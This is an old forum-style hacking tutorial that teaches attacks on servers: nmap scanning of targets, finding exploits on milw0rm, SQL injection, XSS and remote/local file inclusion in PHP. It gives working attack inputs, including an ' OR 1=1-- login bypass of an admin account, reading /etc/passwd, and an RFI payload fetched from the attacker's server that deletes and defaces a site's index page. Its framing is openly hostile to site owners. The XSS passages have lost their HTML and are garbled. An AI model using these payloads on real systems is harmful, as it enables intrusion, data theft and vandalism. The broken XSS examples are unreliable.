The Absolute Basics of Hacking
|
| 11.25.2009, 6:59 PM |
The Absolute Basics of Hacking
Intro
Hello
and welcome to this tutorial. If you see all the text on this page, and
are afraid, you're not meant to be a hacker, quit now. Also, please
know now that unlike in the movies, not everything is hackable. I will
be writing about the basics of hacking servers; I will cover how to
scan and/or exploit vulnerable daemons (services) running on the target
server, and how to discover and/or exploit web-script vulnerabilities.
You will need to know your way around a computer before reading this.
And if you don't know what a word means, Google or Wiki it!; if you
don't understand a concept, post here and I will try to clarify. Thanks
for reading, hope this helps.
Recommended Tools
Port Scanner - nmap - http://nmap.org/
Browser - FireFox - http://firefox.com/
Daemon Vulnerabilities
Description
Daemons
(also commonly known as services) are the processes that run on a
computer that allow it to do things such as serve pages with the HTTP
protocol, etc. (although they do not always necessarily interact over a
network). Sometimes these daemons are poorly coded, which allows for an
attacker to send some sort of input to them, and they either crash, or
in worse cases, they run any code the attacker chooses.
Scanning For Vulnerabilites
Well,
this is where a little common sense comes in, because we need to answer
one question: Which ports to scan? Well, with a little googling, we'd
know that the default port for the HTTPD (web daemon) is 80, for the
FTPD it's 21, etc. So if we wanted to know the version of the HTTPD
running on the server, we'd run "nmap targetsite.com -p 80 -sV". NOTICE
the -sV argument; it is vital, otherwise nmap will just return whether
or not the port is open, and won't provide us with the daemon's
version. This is great and all, but we don't want to just scan one port
at a time do we? Well nmap has us covered there, so just scan multiple
ports by seperating each target port with a comma (,) like so: "nmap
targetsite.com -p 21,80 -sV". However, if you don't mind the scan
taking a while longer, you can scan a range of ports like so: "nmap
targetsite.com -p 1-1000 -sV". This will scan all ports between 1 and
1000.
Checking For Vulnerability
fter
your scan has finished, nmap will display the open ports on your
target, along with their version (if they were identifiable, usually
they are). An example return would look like this: "80/tcp open http
Apache httpd 2.0.32". Taking this information, we search on milw0rm for
"Apache". After skimming through the results, we see that the target is
vulnerable to this vulnerability, which when run on the target server
will make it crash.
Using the Exploits
This
varies, depending on the language that the exploit is coded in; google
on how to do this, since it would just be wasting my time how to use
all of the different languages here.
Common Web-Script Vulnerabilities
Description
In
this section, I will be writing about vulnerabilities in a webserver's
server-sided code. Here are the topics I will be covering:
* SQL Injection
* XSS (Cross-Site Scripting)
* RFI/LFI (Remote/Local File Include)
SQL Injection
Description
SQL
injection is the act of injection your own, custom-crafted SQL commands
into a web-script so that you can manipulate the database any way you
want. Some example usages of SQL injection: Bypass login verification,
add new admin account, lift passwords, lift credit-card details, etc.;
you can access anything that's in the database.
Example Vulnerable Code- login.php (PHP/MySQL)
Here's an example of a vulnerable login code
$user = $_POST['u'];
$pass = $_POST['p'];
if (!isset($user) || !isset($pass)) {
echo("");
} else {
$sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";
$ret = mysql_query($sql);
$ret = mysql_fetch_array($ret);
if ($ret[0] != "") {
echo("Welcome, $user.");
} else {
echo("Incorrect login details.");
}
}
?>
Basically
what this code does, is take the username and password input, and takes
the users's IP from the database in order to check the validity of the
username/password combo.
Testing Inputs For Vulnerability
Just
throw an "'" into the inputs, and see if it outputs an error; if so,
it's probably injectable. If it doesn't display anything, it might be
injectable, and if it is, you will be dealing with blind SQL injection
which anyone can tell you is no fun. Else, it's not injectable.
The Example Exploit
Let's
say we know the admin's username is Administrator and we want into his
account. Since the code doesn't filter our input, we can insert
anything we want into the statement, and just let ourselves in. To do
this, we would simply put "Administrator" in the username box, and "'
OR 1=1--" into the password box; the resulting SQL query to be run
against the database would be "SELECT `IP` FROM `users` WHERE
`username`='Administrator' AND `password='' OR 1=1--'". Because of the
"OR 1=1", it will have the ability to ignore the password requirement,
because as we all know, the logic of "OR" only requires one question to
result in true for it to succeed, and since 1 always equals 1, it
works; the "--" is the 'comment out' character for SQL which means it
ignores everything after it, otherwise the last "'" would ruin the
syntax, and just cause the query to fail.
XSS (Cross-Site Scripting)
Description
This
vulnerability allows for an attacker's input to be sent to unsuspecting
victims. The primary usage for this vulnerability is cookie stealing;
if an attacker steals your cookie, they can log into whatever site they
stole your cookie from under your account (usually, and assuming you
were logged in at the time.)
Example Vulnerable Code - search.php (PHP
$s = $_GET['search'];
// a real search engine would do some database stuff here
echo("You searched for $s. There were no results found");
?>
Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as "XSS". If the site is vulnerable to XSS, you will see something like this: XSS, else, it's not vulnerable.
Example Exploit Code (Redirect)
Because
we're mean, we want to redirect the victim to goatse (don't look that
up if you don't know what it is) by tricking them into clicking on a
link pointed to "search.php?search=". This will output "You searched for .
There were no results found" (HTML) and assuming the target's browser
supports JS (JavaScript) which all modern browsers do unless the
setting is turned off, it will redirect them to goatse.
RFI/LFI (Remote/Local File Include)
Description
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.
Example Vulnerable Code - index.php (PHP)
$page = $_GET['p'];
if (isset($page)) {
include($page);
} else {
include("home.php");
}
?>
Testing Inputs For Vulnerability
Try
visiting "index.php?p=http://www.google.com/"; if you see Google, it is
vulnerable to RFI and consequently LFI. If you don't it's not
vulnerable to RFI, but still may be vulnerable to LFI. Assuming the
server is running *nix, try viewing "index.php?p=/etc/passwd"; if you
see the passwd file, it's vulnerable to LFI; else, it's not vulnerable
to RFI or LFI.
Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server
unlink("index.php");
system("echo Hacked > index.php");
?>
and
then we view "index.php?p=http://our.site.com/malicious.php" then our
malicious code will be run on their server, and by doing so, their site
will simply say 'Hacked' now.
|
|
Category: Hacking tutorials | Added by: h4ckz0r
|
| Views: 2069 | Downloads: 0
| Rating: 0.0/0 |
|
|